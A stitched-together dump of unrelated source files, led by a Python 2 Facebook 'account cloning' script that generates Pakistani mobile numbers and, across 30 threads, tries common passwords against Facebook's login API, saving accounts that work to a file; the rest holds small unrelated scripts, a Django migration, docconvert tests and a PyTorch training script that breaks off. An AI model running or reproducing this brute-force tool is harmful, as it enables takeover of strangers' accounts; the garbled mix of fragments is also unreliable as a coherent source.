\033[1;97m║╚═╝║║╚═╝║──║║──
\033[1;96m╚═══╝╚═══╝──╚╝──
\033[1;92m---------------------USMAN---------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;92m--------------------USMAN----------------------
"""
####Logo####
logo1 = """
\033[1;94m ██╗░░░██╗░██████╗███╗░░░███╗░█████╗░███╗░░██╗
\033[1;92m ██║░░░██║██╔════╝████╗░████║██╔══██╗████╗░██║
\033[1;96m ██║░░░██║╚█████╗░██╔████╔██║███████║██╔██╗██║
\033[1;92m ██║░░░██║░╚═══██╗██║╚██╔╝██║██╔══██║██║╚████║
\033[1;91m ╚██████╔╝██████╔╝██║░╚═╝░██║██║░░██║██║░╚███║
\033[1;94m░╚═════╝░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝
\033[1;91m------------------USMAN----------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN STAR..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;95m-----------------ROMAN------------------------
"""
logo2 = """
\033[1;94m ██╗░░░██╗░██████╗███╗░░░███╗░█████╗░███╗░░██╗
\033[1;92m ██║░░░██║██╔════╝████╗░████║██╔══██╗████╗░██║
\033[1;96m ██║░░░██║╚█████╗░██╔████╔██║███████║██╔██╗██║
\033[1;92m ██║░░░██║░╚═══██╗██║╚██╔╝██║██╔══██║██║╚████║
\033[1;91m ╚██████╔╝██████╔╝██║░╚═╝░██║██║░░██║██║░╚███║
\033[1;94m░╚═════╝░╚═════╝░╚═╝░░░░░╚═╝╚═╝░░╚═╝╚═╝░░╚══╝
print logo
print 47* '\033[1;97m.'
jalan('\x1b[0;91m░██████╗████████╗░█████╗░██████╗░')
jalan('\x1b[0;91m██╔════╝╚══██╔══╝██╔══██╗██╔══██╗')
jalan('\x1b[1;91m╚█████╗░░░░██║░░░███████║██████╔╝')
jalan('\x1b[1;90m░╚═══██╗░░░██║░░░██╔══██║██╔══██╗')
jalan('\x1b[1;90m██████╔╝░░░██║░░░██║░░██║██║░░██║')
jalan('\x1b[1;90m╚═════╝░░░░╚═╝░░░╚═╝░░╚═╝╚═╝░░╚═╝')
print
jalan('\x1b[0;91m ██████╗░░█████╗░██╗░░░██╗')
jalan('\x1b[0;91m ██╔══██╗██╔══██╗╚██╗░██╔╝')
jalan('\x1b[1;91m ██████╦╝██║░░██║░╚████╔╝░')
jalan('\x1b[1;90m ██╔══██╗██║░░██║░░╚██╔╝░░')
jalan('\x1b[1;90m ██████╦╝╚█████╔╝░░░██║░░░')
jalan('\x1b[1;90m ╚═════╝░░╚════╝░░░░╚═╝░░░')
print
\033[1;91m---------------------USMAN-------------------
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mThe Credit For This Code Goes To USMAN.. ..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;91mDEVOLPER
USMAN STAR
\033[1;94mFACEBOOK
USMAN JUTT
\033[1;91mYOUTUBE
NONE
\033[1;93mGITHUB
USMAN204
\033[1;92mWHATAAPP
03444697164
\033[1;92m Apna Time ay ga
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;96mBlacklist Life gun mri wife Tour touch Sky..
\033[1;97m•••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••••
\033[1;97m---------------------USMAN--------------------
"""
CorrectUsername = "USMAN"
CorrectPassword = "STAR BOY"
loop = 'true'
while (loop == 'true'):
username = raw_input("\033[1;97m\x1b[1;91mTool Username \x1b[1;97m»» \x1b[1;97m")
if (username == CorrectUsername):
password = raw_input("\033[1;97m \x1b[1;91mTool Password \x1b[1;97m» \x1b[1;97m")
if (password == CorrectPassword):
print "Logged in successfully as " + username #Dev:love_hacker
time.sleep(2)
loop = 'false'
else:
print "\033[1;94mWrong Password"
os.system('WHATSAPP 03444697164')
else:
print "\033[1;94mWrong Username"
os.system('WHATSAPP 03444697164')
##### LICENSE #####
#=================#
def lisensi():
os.system('clear')
login()
####login#########
def login():
os.system('clear')
print logo1
print "\033[1;91m[1]\x1b[1;91mSTART ( \033[1;92m NOW)"
time.sleep(0.05)
print "\033[1;95m[2]\x1b[1;93mUPDATE (9.0)"
time.sleep(0.05)
print '\x1b[1;94m[0]\033[1;91m Exit ( Back)'
pilih_login()
def pilih_login():
peak = raw_input("\n\033[1;95mCHOOSE: \033[1;93m")
if peak =="":
print "\x1b[1;97mFill In Correctly"
pilih_login()
elif peak =="1":
Zeek()
def Zeek():
os.system('clear')
print logo1
print '\x1b[1;91m[1] START CLONING '
time.sleep(0.10)
print '\x1b[1;92m[2] FB ACCOUNT'
time.sleep(0.10)
print '\x1b[1;95m[3] MORE INFO'
time.sleep(0.10)
print '\x1b[1;96m[4] TRACKER'
time.sleep(0.10)
print '\x1b[1;97m[5] CLONING ERROR'
time.sleep(0.10)
print '\x1b[1;91m[6] FACEBOOK'
time.sleep(0.10)
print '\x1b[1;94m[0] back'
time.sleep(0.05)
action()
def action():
peak = raw_input('\n\033[1;97mCHOOSE:\033[1;97m')
if peak =='':
print '[!] Fill In Correctly'
action()
elif peak =="1":
os.system("clear")
print logo2
print "Enter any Pakistan Mobile code Number"+'\n'
print 'Enter any code 1 to 49'
print 'telenor.jazz.zong.warid'
try:
c = raw_input("\033[1;97mCHOOSE : ")
k="03"
idlist = ('.txt')
for line in open(idlist,"r").readlines():
id.append(line.strip())
except IOError:
print ("[!] File Not Found")
raw_input("\n[ Back ]")
blackmafiax()
elif peak =='0':
login()
else:
print '[!] Fill In Correctly'
action()
print 50* '\033[1;94m-'
xxx = str(len(id))
jalan ('\033[1;91m Total ids number: '+xxx)
jalan ('\033[1;92mCode you choose: '+c)
jalan ("\033[1;93mWait A While Start Cracking...")
jalan ("\033[1;94mTo Stop Process Press Ctrl+z")
print 50* '\033[1;97m-'
def main(arg):
global cpb,oks
user = arg
try:
os.mkdir('save')
except OSError:
pass
try:
pass1 = user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass1 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass1
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass1+'\n')
okb.close()
oks.append(c+user+pass1)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass1
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass1+'\n')
cps.close()
cpb.append(c+user+pass1)
else:
pass2 = k + c + user
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass2 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass2
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass2+'\n')
okb.close()
oks.append(c+user+pass2)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass2
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass2+'\n')
cps.close()
cpb.append(c+user+pass2)
else:
pass3="Pakistan123"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass3 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass3
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass3+'\n')
okb.close()
oks.append(c+user+pass3)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass3
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass3+'\n')
cps.close()
cpb.append(c+user+pass3)
else:
pass4="SOMI11"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass4 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass4
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass4+'\n')
okb.close()
oks.append(c+user+pass4)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass4
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass4+'\n')
cps.close()
cpb.append(c+user+pass4)
else:
pass5="786786"
data = br.open('https://b-api.facebook.com/method/auth.login?access_token=237759909591655%25257C0f140aabedfb65ac27a739ed1a2263b1&format=json&sdk_version=1&email=' +k+c+user+ '&locale=en_US&password=' + pass5 + '&sdk=ios&generate_session_cookies=1&sig=3f555f98fb61fcd7aa0c44f58f522efm')
q = json.load(data)
if 'access_token' in q:
print '\x1b[1;93m(FREE) ' + k + c + user + ' | ' + pass5
okb = open('save/cloned.txt', 'a')
okb.write(k+c+user+pass5+'\n')
okb.close()
oks.append(c+user+pass5)
else:
if 'www.facebook.com' in q['error_msg']:
print '\033[1;97m(AFTER 7 DAYS) ' + k + c + user + ' | ' + pass5
cps = open('save/cloned.txt', 'a')
cps.write(k+c+user+pass5+'\n')
cps.close()
cpb.append(c+user+pass5)
except:
pass
p = ThreadPool(30)
p.map(main, id)
print 50* '\033[1;91m-'
print 'Process Has Been Completed ...'
print 'Total Online/Offline : '+str(len(oks))+'/'+str(len(cpb))
print('Cloned Accounts Has Been Saved : save/cloned.txt')
jalan("Note : Your Offline account Will Open after 10 to 20 days")
print ''
print """
███
──────────███║║║║║║║███
─────────█║║║║║║║║║║║║║█
────────█║║║║███████║║║║█
───────█║║║║██─────██║║║║█
──────█║║║║██───────██║║║║█
─────█║║║║██─────────██║║║║█
─────█║║║██───────────██║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
─────█║║║█─────────────█║║║█
────███████───────────███████
───██║║║║║║██────────██║║║║║██
──██║║║║║║║║██──────██║║║║║║║██
─██║║║║║║║║║║██───██║║║║║║║║║║██
██║║║║║║║║║║║║█████║║║║║║║║║║║║██
█║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║║█
█║║║║║║║║║║║║║█████║║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
█║║║║║║║║║║║║█░░░░░█║║║║║║║║║║║║█
██║║║║║║║║║║║█░░░░░█║║║║║║║║║║║██
██║║║║║║║║║║║║█░░░█║║║║║║║║║║║║██
─██║║║║║║║║║║║█░░░█║║║║║║║║║║║██
──██║║║║║║║║║║█░░░█║║║║║║║║║║██
───██║║║║║║║║║█░░░█║║║║║║║║║██
────██║║║║║║║║█████║║║║║║║║██
─────██║║║║║║║║███║║║║║║║║██
──────██║║║║║║║║║║║║║║║║║██
───────██║║║║║║║║║║║║║║║██
────────██║║║║║║║║║║║║║██
─────────██║║║║║║║║║║║██
──────────██║║║║║║║║║██
───────────██║║║║║║║██
────────────██║║║║║██
─────────────██║║║██
──────────────██║██
───────────────███
───────────────────────▄██▄▄██▄
──────────────────────██████████
──────────────────────▀████████▀
────────────────────────▀████▀
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
─────────────────────────████
──────────────────────▄▄▄████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▀▀▀████
──────────────────────▄█████▀
\033[1;96mThanks me later
\033[1;95mFb\033[1;97mUSMAN STAR
\033[1;95myoutube\033[1;9703444697164"""
raw_input("\n\033[1;92m[\033[1;92mBack\033[1;95m]")
login()
if __name__ == '__main__':
login()
| [
"noreply@github.com"
] | noreply@github.com |
b3f4e2fa2b03f2d9fa20bdc2cbd2a0670ee8d3d4 | 8770d4f7f9bc305b79d0c372b320273e78131229 | /3(1)voting.py | f0826825a8c44bc4e4a25188ac15a2fc2fbda4bb | [] | no_license | tarundev-x/55_PYTHON-lab_experiements | 29010618f565bdb21d58646e402219ef18ed1c1a | 9ba0154ac00dca4ed4df91d2942f565160f0a86f | refs/heads/main | 2023-04-25T00:49:53.686538 | 2021-05-15T07:04:42 | 2021-05-15T07:04:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 202 | py | age=int(input("Enter your age"))
if age>=18:
print("you are eligible to vote")
else:
print("your are not eligible to vote")
#output:Enter your age20
#you are eligible to vote
| [
"noreply@github.com"
] | noreply@github.com |
a191f458a432f1b0535f9c286f67eba82f9f13ab | 07cc9fa9f87e1d7dba35b9ec3788c08bf5aabbcb | /import requests.py | 1966589d6232e1d1c21eed575795c6948d7ef916 | [] | no_license | rgallagher86/Projects | d84c80be67068867884cb2c7c67347dc7005b5e4 | cb40b3e2b7be632596999d92f5aa3bd66a2d08ac | refs/heads/master | 2022-08-16T16:26:10.411619 | 2022-08-11T03:08:32 | 2022-08-11T03:08:32 | 120,629,477 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 699 | py | import csv
import requests
import os
path = os.getcwd()
print(path)
url = 'https://gorest.co.in/public/v2/users'
headers = { "content-type": "application/json" }
response = requests.get(url,headers)
print(response.status_code)
data = response.json()
#data = data['Data']
csvHeader = 'id,email'
with open(str(path) + "\\emaillist.csv","w") as f:
writer = csv.writer(f)
print(csvHeader)
for value in data:
email = str(value['email'])
userId = str(value['id'])
status = str(value['status'])
row = userId + ',' + email
if email.endswith('.io') and status == 'active':
print(row)
print(status)
f.write(row) | [
"rgallagher28@outlook.com"
] | rgallagher28@outlook.com |
8056f5ec5c2b98acace02db1a7237c326908a2ad | 07776f343f5caa22784ca44803695b80d551fbb2 | /carga_horaria/migrations/0079_auto_20210303_1739.py | 73c6d06aa64a5814342d2faa9830c8b4ab4d5e04 | [] | no_license | j-alexander-acosta/AAGESuite-Antiguo | 83a590d1fbe1d39a56f1455bc04bf78364d70661 | c14ab5a7d03fb6f45d29f0665a948da3387104fb | refs/heads/master | 2023-08-30T20:33:32.249922 | 2021-10-28T18:03:55 | 2021-10-28T18:03:55 | 428,706,825 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.28 on 2021-03-03 17:39
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('carga_horaria', '0078_auto_20210114_2131'),
]
operations = [
migrations.AddField(
model_name='historicalprofesor',
name='fecha_inicio',
field=models.DateField(null=True, verbose_name='fecha inicio contrato'),
),
migrations.AddField(
model_name='profesor',
name='fecha_inicio',
field=models.DateField(null=True, verbose_name='fecha inicio contrato'),
),
]
| [
"don@hso.rocks"
] | don@hso.rocks |
324c8db32c2043eae2b04e66a691c1e62e9cfe83 | 9e76a2f8c42d88b8af50ee2c6111f92b49e9843e | /tests/test_epytext_writer.py | 690fc0db7590959fa19aed4da1019e5c45ce6e8e | [
"BSD-3-Clause"
] | permissive | justinchuby/docconvert | 33dad9724b6600cffc9d7c24111be06830aac5c6 | 2843f7446546ae90ba3f38e1246e69d208e0f053 | refs/heads/master | 2023-03-19T17:17:34.861428 | 2020-07-11T16:37:51 | 2020-07-11T16:37:51 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,818 | py | """Unit tests for EpytextWriter."""
import docconvert
class TestEpytextWriter(object):
@classmethod
def setup_method(cls):
cls.doc = docconvert.parser.Docstring()
cls.config = docconvert.configuration.DocconvertConfiguration.create_default()
def test_write_attributes(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("raw", ["This is a docstring."]))
self.doc.add_attribute("attr1", kind="str")
self.doc.add_attribute("attr2", desc=["Description.", "More description."])
self.doc.add_element(("end_quote", '"""'))
writer = docconvert.writer.EpytextWriter(self.doc, " ", self.config)
assert writer.write() == [
' """This is a docstring.\n',
" @var attr1:\n",
" @type attr1: str\n",
" @var attr2: Description. More description.\n",
' """\n',
]
def test_write_attributes_without_types(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_attribute("attr1", kind="str")
self.doc.add_attribute(
"attr2", kind="int", desc=["Description.", "More description."]
)
self.doc.add_element(("end_quote", '"""'))
self.config.output.use_types = False
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""\n',
"@var attr1:\n",
"@var attr2: Description. More description.\n",
'"""\n',
]
def test_write_args(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("raw", ["This is a docstring."]))
self.doc.add_arg("arg1", kind="str")
self.doc.add_arg(
"arg2",
kind="int",
desc=["Description.", "More description."],
optional=True,
)
self.doc.add_element(("end_quote", '"""'))
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""This is a docstring.\n',
"@param arg1:\n",
"@type arg1: str\n",
"@param arg2: Description. More description.\n",
"@type arg2: int\n",
'"""\n',
]
def test_write_args_with_optional(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("raw", ["This is a docstring."]))
self.doc.add_arg("arg1", optional=True)
self.doc.add_arg(
"arg2",
kind="int",
desc=["Description.", "More description."],
optional=True,
)
self.doc.add_element(("end_quote", '"""'))
self.config.output.use_optional = True
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""This is a docstring.\n',
"@param arg1:\n",
"@type arg1: optional\n",
"@param arg2: Description. More description.\n",
"@type arg2: int, optional\n",
'"""\n',
]
def test_write_args_with_keywords_section(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("raw", ["This is a docstring."]))
self.doc.add_arg("arg1", kind="str")
self.doc.add_arg(
"arg2",
kind="int",
desc=["Description.", "More description."],
optional=True,
)
self.doc.add_element(("end_quote", '"""'))
self.config.output.separate_keywords = True
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""This is a docstring.\n',
"@param arg1:\n",
"@type arg1: str\n",
"@keyword arg2: Description. More description.\n",
"@type arg2: int\n",
'"""\n',
]
def test_write_args_with_keywords_section_with_optional(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("raw", ["This is a docstring."]))
self.doc.add_arg("arg1", kind="str", optional=True)
self.doc.add_arg(
"arg2",
kind="int",
desc=["Description.", "More description."],
optional=True,
)
self.doc.add_element(("end_quote", '"""'))
self.config.output.separate_keywords = True
self.config.output.use_optional = True
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""This is a docstring.\n',
"@keyword arg1:\n",
"@type arg1: str\n",
"@keyword arg2: Description. More description.\n",
"@type arg2: int\n",
'"""\n',
]
def test_write_raises(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_raises("TypeError")
self.doc.add_raises("KeyError", desc=["Description.", "More description."])
self.doc.add_element(("end_quote", '"""'))
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""\n',
"@raises TypeError:\n",
"@raises KeyError: Description. More description.\n",
'"""\n',
]
def test_write_returns(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_return("str", desc=["Description.", "More description."])
self.doc.add_element(("end_quote", '"""'))
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""\n',
"@returns: Description. More description.\n",
"@rtype: str\n",
'"""\n',
]
def test_write_directives(self):
self.doc.add_element(("start_quote", '"""'))
self.doc.add_element(("note", ["Description.", "More description."]))
self.doc.add_element(("example", ["Description."]))
self.doc.add_element(("reference", ["Description."]))
self.doc.add_element(("warning", ["Description."]))
self.doc.add_element(("seealso", ["Description."]))
self.doc.add_element(("todo", ["Description."]))
self.doc.add_element(("end_quote", '"""'))
writer = docconvert.writer.EpytextWriter(self.doc, "", self.config)
assert writer.write() == [
'"""\n',
"@note: Description.\n",
" More description.\n",
"@example: Description.\n",
"@reference: Description.\n",
"@warning: Description.\n",
"@seealso: Description.\n",
"@todo: Description.\n",
'"""\n',
]
| [
"cameronjbillingham@gmail.com"
] | cameronjbillingham@gmail.com |
e20be4dff4b04d5fd5656ee61a9aa126086bb2d5 | 2208ecadbd4906bcde445389ee888368915b0e61 | /Grading.py | 2aedf90d2125bbbb3eb387808241f6bebfe9dab3 | [] | no_license | Anga22/testrepo | f3360ef9a7305fba41610041cce240b609e7148b | 4ddee89e84c8134cbf7d113886d3773da84dfd96 | refs/heads/main | 2022-12-28T20:02:56.757653 | 2020-10-03T16:39:58 | 2020-10-03T16:39:58 | 300,925,172 | 0 | 0 | null | 2020-10-03T16:39:59 | 2020-10-03T16:26:31 | Python | UTF-8 | Python | false | false | 294 | py | #!/usr/bin/env python
# coding: utf-8
# In[58]:
x = int(input())
if x < 50 :
y = ('Fail')
if x >= 75 :
y = ('First')
if 70 <= x <= 74 :
y = ('Upper second')
if 60 <= x <= 69 :
y = ('Lower second')
if 50 <= x <= 59 :
y = ('Third')
print(y)
# In[ ]:
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
e61a60e4b4b44d54848881f621d76d68a6caed43 | 3cd16e9e9b4b99ba26cd89f115a3dc8a66832022 | /pytorch_TEM_train.py | b85e13421a1bb77da9ec06278f544b6b249735cb | [] | no_license | guilk/diva | 407e63be6d95b07c64f9284094be35002af13af0 | 6afd81f7cca6f195255de8adc98ef64ed794e7ae | refs/heads/master | 2020-03-29T03:47:55.185354 | 2018-10-19T01:19:10 | 2018-10-19T01:19:10 | 149,501,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,654 | py | import torch
import torch.optim as optim
from torch.autograd import Variable
import torch.nn as nn
from TEM_model import TEM
# import TEM_load_data
import pytorch_TEM_load_data as TEM_load_data
import argparse
import numpy as np
import os
import cPickle
def binary_logistic_loss(gt_scores, pred_anchors):
'''
Calculate weighted binary logistic loss
:param gt_scores:
:param pred_anchors:
:return:
'''
# print gt_scores.size()
# print pred_anchors.size()
gt_scores = gt_scores.contiguous().view(-1)
pred_anchors = pred_anchors.contiguous().view(-1)
pmask = (gt_scores>0.5).type(torch.cuda.FloatTensor)
num_positive = pmask.sum()
num_entries = gt_scores.size()[0]
ratio = num_entries/num_positive
coef_0 = 0.5 * ratio / (ratio-1)
coef_1 = coef_0 * (ratio-1)
loss = coef_1*pmask*torch.log(pred_anchors) + coef_0*(1.0-pmask)*torch.log(1.0-pred_anchors)
loss = -torch.mean(loss)
num_sample = [num_positive, ratio]
return loss, num_sample
def run_tem(tem_model, X_feature, Y_action, Y_start, Y_end):
anchors = tem_model(X_feature)
anchors_action = anchors[:,0,:]
anchors_start = anchors[:,1,:]
anchors_end = anchors[:,2,:]
loss_action, action_num_sample = binary_logistic_loss(Y_action, anchors_action)
loss_start, start_num_sample = binary_logistic_loss(Y_start, anchors_start)
loss_end, end_num_sample = binary_logistic_loss(Y_end, anchors_end)
loss = 2 * loss_action + loss_start + loss_end
return loss, loss_action, loss_start, loss_end
def parse_arguments():
parser = argparse.ArgumentParser()
# parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--lr', type=float, default=0.0001, help='learning rate for Critic, default=0.00005')
parser.add_argument('--beta1', type=float, default=0.9, help='beta1 for adam. default=0.9')
parser.add_argument('--niter', type=int, default=30, help='number of epochs to train for')
parser.add_argument('--batchsize', type=int, default=8, help='input batch size')
parser.add_argument('--embedsize', type=int, default=64, help='embedding size of input feature')
parser.add_argument('--hiddensize', type=int, default=128, help='hidden size of network')
parser.add_argument('--experiment', default=None, help='Where to store samples and models')
parser.add_argument('--stepsize', type=int, default=10, help='the step size of learning rate schedule')
parser.add_argument('--gamma', type=float, default=0.1, help = 'learning rate decay gamma')
opt = parser.parse_args()
return opt
if __name__ == '__main__':
opt = parse_arguments()
num_epoches = opt.niter
batch_size = opt.batchsize
if opt.experiment == None:
opt.experiment = './pytorch_models'
else:
opt.experiment = os.path.join('./pytorch_models', opt.experiment)
model_root = os.path.join(opt.experiment, 'TEM')
if not os.path.exists(model_root):
os.makedirs(model_root)
# experiment_root = './pytorch_models/lr_{}_niter_{}_batchsize_{}_embedsize_{}_hiddensize_{}_stepsize_{}_gamma_{}'\
# .format(opt.lr, opt.niter, opt.batchsize, opt.embedsize, opt.hiddensize, opt.stepsize, opt.gamma)
# Intialize model
tem = TEM(embedsize=opt.embedsize, hiddensize=opt.hiddensize)
tem.cuda()
optimizer = optim.Adam(tem.parameters(), lr = opt.lr, betas=(opt.beta1, 0.999), weight_decay = 0.001)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=opt.stepsize, gamma=opt.gamma)
gt_path = '../../datasets/virat/bsn_dataset/stride_100_interval_300/gt_annotations.pkl'
split_path = '../../datasets/virat/bsn_dataset/stride_100_interval_300/split.pkl'
train_dict, val_dict, test_dict = TEM_load_data.getDatasetDict(gt_path, split_path)
# # small toy set for fast debugging
# toy_dict = {}
# for idx, (k,v) in enumerate(val_dict.iteritems()):
# if idx > 200:
# break
# toy_dict[k] = v
#
# val_dict = toy_dict
rgb_features = TEM_load_data.load_whole_features()
train_data_dict = TEM_load_data.getFullData(train_dict, val_dict, test_dict, "train", rgb_features)
val_data_dict = TEM_load_data.getFullData(train_dict, val_dict, test_dict, "val", rgb_features)
train_info={"loss":[],"loss_action":[],"loss_start":[],"loss_end":[]}
val_info={"loss":[],"loss_action":[],"loss_start":[],"loss_end":[]}
info_keys=train_info.keys()
best_val_cost = 1000000
for epoch in range(num_epoches):
'''
Train
'''
scheduler.step()
# batch_video_list = TEM_load_data.getBatchList(len(val_dict), batch_size)
batch_video_list = TEM_load_data.getBatchList(len(train_dict), batch_size)
mini_info = {'loss':[], 'loss_action':[], 'loss_start':[], 'loss_end':[]}
for p in tem.parameters():
p.requires_grad = True
tem.train()
for idx in range(len(batch_video_list)):
# print 'Process {}th batch'.format(idx)
batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
TEM_load_data.getBatchData(batch_video_list[idx],train_data_dict)
# batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
# TEM_load_data.getBatchData(batch_video_list[idx],val_data_dict)
# batch_anchor_feature = np.transpose(batch_anchor_feature, (0, 2, 1))
# batch_size, num_timesteps, feat_dim => batch_size, feat_dim, num_timesteps
X_feature = torch.FloatTensor(batch_anchor_feature).cuda()
Y_action = torch.FloatTensor(batch_label_action).cuda()
Y_start = torch.FloatTensor(batch_label_start).cuda()
Y_end = torch.FloatTensor(batch_label_end).cuda()
loss, loss_action, loss_start, loss_end = run_tem(tem, X_feature, Y_action, Y_start, Y_end)
mini_info['loss_action'].append(loss_action.data.cpu().numpy())
mini_info['loss_start'].append(loss_start.data.cpu().numpy())
mini_info['loss_end'].append(loss_end.data.cpu().numpy())
mini_info['loss'].append(loss.data.cpu().numpy())
tem.zero_grad()
loss.backward()
optimizer.step()
train_info['loss_action'].append(np.mean(mini_info['loss_action']))
train_info['loss_start'].append(np.mean(mini_info['loss_start']))
train_info['loss_end'].append(np.mean(mini_info['loss_end']))
'''
Validation
'''
# for p in tem.parameters():
# p.requires_grad = True
tem.eval()
batch_video_list = TEM_load_data.getBatchList(len(val_dict), batch_size)
mini_info = {'loss':[], 'loss_action':[], 'loss_start':[], 'loss_end':[]}
for idx in range(len(batch_video_list)):
batch_label_action,batch_label_start,batch_label_end,batch_anchor_feature=\
TEM_load_data.getBatchData(batch_video_list[idx],val_data_dict)
# batch_anchor_feature = np.transpose(batch_anchor_feature, (0, 2, 1))
X_feature = torch.FloatTensor(batch_anchor_feature).cuda()
Y_action = torch.FloatTensor(batch_label_action).cuda()
Y_start = torch.FloatTensor(batch_label_start).cuda()
Y_end = torch.FloatTensor(batch_label_end).cuda()
loss, loss_action, loss_start, loss_end = run_tem(tem, X_feature, Y_action, Y_start, Y_end)
mini_info['loss_action'].append(loss_action.data.cpu().numpy())
